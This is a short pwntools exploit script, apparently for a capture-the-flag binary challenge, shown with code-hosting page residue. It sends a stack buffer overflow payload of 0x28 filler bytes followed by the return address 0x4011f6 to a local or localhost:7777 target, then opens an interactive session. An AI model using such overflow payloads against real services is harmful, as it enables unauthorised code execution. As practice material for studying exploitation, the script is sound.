29 lines
514 B
Python
Executable File
29 lines
514 B
Python
Executable File
#!/usr/bin/python3
|
|
from pwn import *
|
|
|
|
filename = "./pwn"
|
|
libcname = "/lib/x86_64-linux-gnu/libc.so.6"
|
|
host = 'localhost'
|
|
port = 7777
|
|
elf = context.binary = ELF(filename)
|
|
context.terminal = ['tmux', 'neww']
|
|
if libcname:
|
|
libc = ELF(libcname)
|
|
gs = '''
|
|
b main
|
|
'''
|
|
|
|
def start():
|
|
if args.GDB:
|
|
return gdb.debug(elf.path, gdbscript = gs)
|
|
elif args.REMOTE:
|
|
return remote(host, port)
|
|
else:
|
|
return process(elf.path)
|
|
|
|
p = start()
|
|
|
|
p.sendline(b'a'*0x28 + p64(0x4011f6))
|
|
|
|
p.interactive()
|